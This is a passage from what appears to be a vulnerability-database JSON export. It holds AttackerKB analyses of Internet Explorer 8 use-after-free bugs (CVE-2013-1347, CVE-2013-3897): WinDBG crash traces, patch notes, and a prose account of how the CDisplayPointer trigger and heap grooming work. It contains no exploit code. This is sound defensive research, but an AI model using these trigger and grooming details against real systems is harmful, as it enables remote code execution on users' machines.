mshtml!Method_IDispatchpp_BSTR+0x000000d1\n 636430c9 mshtml!CBase::ContextInvokeEx+0x000005d1\n 63643595 mshtml!CBase::InvokeEx+0x00000025\n 63643832 mshtml!DispatchInvokeCollection+0x0000014b\n 635e1cdc mshtml!CDocument::InvokeEx+0x000000f1\n 63642f30 mshtml!CBase::VersionedInvokeEx+0x00000020\n 63642eec mshtml!PlainInvokeEx+0x000000ea\n 633a6d37 jscript!IDispatchExInvokeEx2+0x000000f8\n 633a6c75 jscript!IDispatchExInvokeEx+0x0000006a\n 633a9cfe jscript!InvokeDispatchEx+0x00000098\n \n \n \n \n However, after garbage collecting, mshtml!CGenericElement::`vftable' is freed:\n \n \n\neax=037cc598 ebx=037cc548 ecx=04a48d10 edx=633b5f09 esi=070eefa0 edi=037cc538 \neip=633b5f09 esp=037cc4f8 ebp=037cc55c iopl=0 nv up ei pl zr na pe nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 \njscript!JsAtan2: \n633b5f09 8bff mov edi,edi \n0:008> !heap -p -a poi(0x0563cfb0)\n \n \n address 06a99fc8 found in\n _DPH_HEAP_ROOT @ 151000\n in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)\n 5087390: 6a99000 2000\n 7c927553 ntdll!RtlFreeHeap+0x000000f9\n 636b52c6 mshtml!CGenericElement::`vector deleting destructor'+0x0000003d\n 63628a50 mshtml!CBase::SubRelease+0x00000022\n 63640d1b mshtml!CElement::PrivateRelease+0x00000029\n 6363d0ae mshtml!PlainRelease+0x00000025\n 63663c03 mshtml!PlainTrackerRelease+0x00000014\n 633a10b4 jscript!VAR::Clear+0x0000005c\n 6339fb4a jscript!GcContext::Reclaim+0x000000ab\n 6339fd33 jscript!GcContext::CollectCore+0x00000113\n 63405594 jscript!JsCollectGarbage+0x0000001d\n 633a92f7 jscript!NameTbl::InvokeInternal+0x00000137\n 633a6650 jscript!VAR::InvokeByDispID+0x0000017c\n 633a9c0b jscript!CScriptRuntime::Run+0x00002989\n 633a5ab0 jscript!ScrFncObj::CallWithFrameOnStack+0x000000ff\n 633a59f7 jscript!ScrFncObj::Call+0x0000008f\n 633a5743 jscript!CSession::Execute+0x00000175\n \n\n0:008> dc 0x0563cfb0; .echo; dc poi(0x0563cfb0) \n0563cfb0 06a99fc8 00000000 ffff0075 ffffffff \u2026\u2026..u\u2026\u2026. \n0563cfc0 00000071 00000000 00000000 00000000 q\u2026\u2026\u2026\u2026\u2026 \n0563cfd0 00000000 0563cfd8 00000152 00000001 \u2026\u2026c.R\u2026\u2026. \n0563cfe0 00000000 00000000 0563cfc0 00000000 \u2026\u2026\u2026.c\u2026.. \n0563cff0 00000010 00000000 00000000 d0d0d0d0 \u2026\u2026\u2026\u2026\u2026. \n0563d000 ???????? ???????? ???????? ???????? ???????????????? \n0563d010 ???????? ???????? ???????? ???????? ???????????????? \n0563d020 ???????? ???????? ???????? ???????? ????????????????\n\n06a99fc8 ???????? ???????? ???????? ???????? ???????????????? \n06a99fd8 ???????? ???????? ???????? ???????? ???????????????? \n06a99fe8 ???????? ???????? ???????? ???????? ???????????????? \n06a99ff8 ???????? ???????? ???????? ???????? ???????????????? \n06a9a008 ???????? ???????? ???????? ???????? ???????????????? \n06a9a018 ???????? ???????? ???????? ???????? ???????????????? \n06a9a028 ???????? ???????? ???????? ???????? ???????????????? \n06a9a038 ???????? ???????? ???????? ???????? ????????????????\n \n \n You can see that the reference is still there. When the page reloads, this ends up with a crash:\n \n \n\n0:008> g \n(5f4.2c0): Access violation \u2013 code c0000005 (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \neax=63aae200 ebx=0563cfb0 ecx=06a99fc8 edx=00000000 esi=037cf0b8 edi=00000000 \neip=6363fcc4 esp=037cf08c ebp=037cf0a4 iopl=0 nv up ei pl zr na pe nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 \nmshtml!CElement::Doc: \n6363fcc4 8b01 mov eax,dword ptr [ecx] ds:0023:06a99fc8=????????\n \n \n Callstack at the time of the crash:\n \n \n\n0:008> k \nChildEBP RetAddr \n037cf1f8 63602718 mshtml!CElement::Doc \n037cf214 636026a3 mshtml!CTreeNode::ComputeFormats+0xb9 \n037cf4c0 63612a85 mshtml!CTreeNode::ComputeFormatsHelper+0x44 \n037cf4d0 63612a45 mshtml!CTreeNode::GetFancyFormatIndexHelper+0x11 \n037cf4e0 63612a2c mshtml!CTreeNode::GetFancyFormatHelper+0xf \n037cf4f0 63717f30 mshtml!CTreeNode::GetFancyFormat+0x35 \n037cf4fc 63717f4e mshtml!ISpanQualifier::GetFancyFormat+0x5a \n037cf50c 63717afe mshtml!SLayoutRun::HasInlineMbp+0x10 \n037cf51c 63724f88 mshtml!SRunPointer::HasInlineMbp+0x53 \n037cf554 6373a5a1 mshtml!CLayoutBlock::GetIsEmptyContent+0xf1 \n037cf58c 6382ed01 mshtml!CLayoutBlock::GetIsEmptyContent+0x3f \n037cf5d8 63702e23 mshtml!CBlockContainerBlock::BuildBlockContainer+0x250 \n037cf610 63708acf mshtml!CLayoutBlock::BuildBlock+0x1c1 \n037cf6d4 6370bd31 mshtml!CCssDocumentLayout::GetPage+0x22a \n037cf844 63668184 mshtml!CCssPageLayout::CalcSizeVirtual+0x242 \n037cf97c 6368a1cb mshtml!CLayout::CalcSize+0x2b8 \n037cfa78 6374799d mshtml!CLayout::DoLayout+0x11d \n037cfa8c 636514de mshtml!CCssPageLayout::Notify+0x140 \n037cfa98 636678c6 mshtml!NotifyElement+0x41 \n\u201d`\n\nPatch information:\n\nPatch: \nDo a mshtml!CLayoutBlock::RemoveChild in mshtml!CBlockContainerBlock::BuildBlockContainer before \nthe layout structure access. More information about this patch can be found here:\n\n<https://blogs.technet.com/b/srd/archive/2013/05/08/microsoft-quot-fix-it-quot-available-to-mitigate-internet-explorer-8-vulnerability.aspx?Redirected=true>\n", "modified": "2020-02-13T00:00:00", "published": "2013-05-05T00:00:00", "id": "AKB:D8049635-0B6A-42D4-A516-3F61BF8BB5D7", "href": "https://attackerkb.com/topics/ZdcVAInXlj/microsoft-internet-explorer-cgenericelement-use-after-free", "type": "attackerkb", "title": "Microsoft Internet Explorer CGenericElement Use-After-Free", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-15T18:37:58", "bulletinFamily": "info", "cvelist": ["CVE-2012-4969", "CVE-2013-1347", "CVE-2013-3893", "CVE-2013-3897"], "description": "Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help URL that triggers loading of hxds.dll.\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\n# Information\n\n\u201cMS13-080 also fixes a second CVE vulnerability that has been exploited in limited attacks over the \nweb. This issue is a user-after-free vulnerability in CDisplayPointer triggered with \n\u201conpropertychange\u201d event handler. This exploit was found cached on a popular Javascript analysis \nwebsite and reported to us. The exploit code for this issue, released probably around mid-September \n, uses heap-spray to allocate a small ROP chain around address 0x14141414 and is designed to target \nonly IE8 running on Windows XP for Korean and Japanese language-based users\u201d \u2013 Microsoft\n\nThis issue is a use-after-free vulnerability in CDisplayPointer via the use of a \u201conpropertychange\u201d \nevent handler. To setup the appropriate buggy conditions, we first craft the DOM tree in a specific \norder, where a CBlockElement comes after the CTextArea element. There are also other ways to acheive \nthe same results, for example: Replace CBlockElement with another CTextArea. One possible explanation \nfor that is perhaps the second element needs to hold a reference of the parent.\n\nIf we use a select() function for the CTextArea element, two important things will happen: a \nCDisplayPointer object will be created for CTextArea, and it will also trigger another event called \n\u201conselect\u201d. The \u201conselect\u201d event will allow us to setup for the actual event handler we want to abuse\n\n * the \u201conpropertychange\u201d event. Since the CBlockElement is a child of CTextArea, if we do a node swap \nof CBlockElement in \u201conselect\u201d, this will trigger \u201conpropertychange\u201d. During \u201conpropertychange\u201d event \nhandling, a free of the CDisplayPointer object can be forced by using an \u201cUnslect\u201d (other approaches \nalso apply), but a reference of this freed memory will still be kept by CDoc::ScrollPointerIntoView, \nspecifically after the CDoc::GetLineInfo call, because it is still trying to use that to update \nCDisplayPointer\u2019s position. When this invalid reference arrives in QIClassID, a crash finally occurs \ndue to accessing the freed memory. By controlling this freed memory, it is possible to achieve arbitrary \ncode execution under the context of the user. \n\n\nThe trigger of the vulnerability seems to be based on previously discovered bugs, specifically \nCVE-2012-4969 (ie_execcommand_uaf) and CVE-2013-1347 (ie_cgenericelement_uaf). This just means \nthat the browser fuzzing tool was tweaked based on these references. There is some junk code in \nthe trigger. For example, contentEditable does not have to be enabled, but this attribute this \ncommonly enabled by fuzzers because of document selection. There is also multiple junk CollectGarbage \ncalls, with Math.atan2() debugging messages around them \u2013 which is also an indicator that the exploit \nauthor was still in the process of understanding what they\u2019re for. The vulnerability seems to only \nwork on Internet Explorer 8 (tested on Win 7 and Win XP), older versions might be affected, did not \ncheck. It does not work against IE9 (tested).\n\nThe exploit actually looks more like a proof-of-concept rather than weaponized. The Math.atan2() \nfunctions are used as a way to print debugging messages in WinDBG is a strong indicator that this poc \nwas possibly incomplete. It\u2019s possible that the experimental version was leaked on the web, so \nit was rushed into deployment.\n\nThe heap grooming technique is exactly the same as the CVE-2013-3893 \u2013 it\u2019d use the \nsetAttribute() function trigger heap allocations, creates 2000 of them, and the frees half of them. \nThis also indicates it\u2019s probably done by the same author.\n", "modified": "2020-10-14T00:00:00", "published": "2020-10-14T00:00:00", "id": "AKB:3C7B4CF8-80C4-45A5-9363-AFAA8C364D11", "href": "https://attackerkb.com/topics/KfWrR0dJNU/microsoft-internet-explorer-setmousecapture-use-after-free", "type": "attackerkb", "title": "Microsoft Internet Explorer SetMouseCapture Use-After-Free", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:51", "bulletinFamily": "software", "cvelist": ["CVE-2013-1307", "CVE-2013-1311", "CVE-2013-1308", "CVE-2013-0811", "CVE-2013-3140", "CVE-2013-2551", "CVE-2013-1347", "CVE-2013-1309", "CVE-2013-1306", "CVE-2013-1312", "CVE-2013-1297", "CVE-2013-1310"], "description": "Information leakage, multiple use-after-free vulnerabilities", "edition": 1, "modified": "2013-05-27T00:00:00", "published": "2013-05-27T00:00:00", "id": "SECURITYVULNS:VULN:13082", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13082", "title": "Microsoft Internet Explorer multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}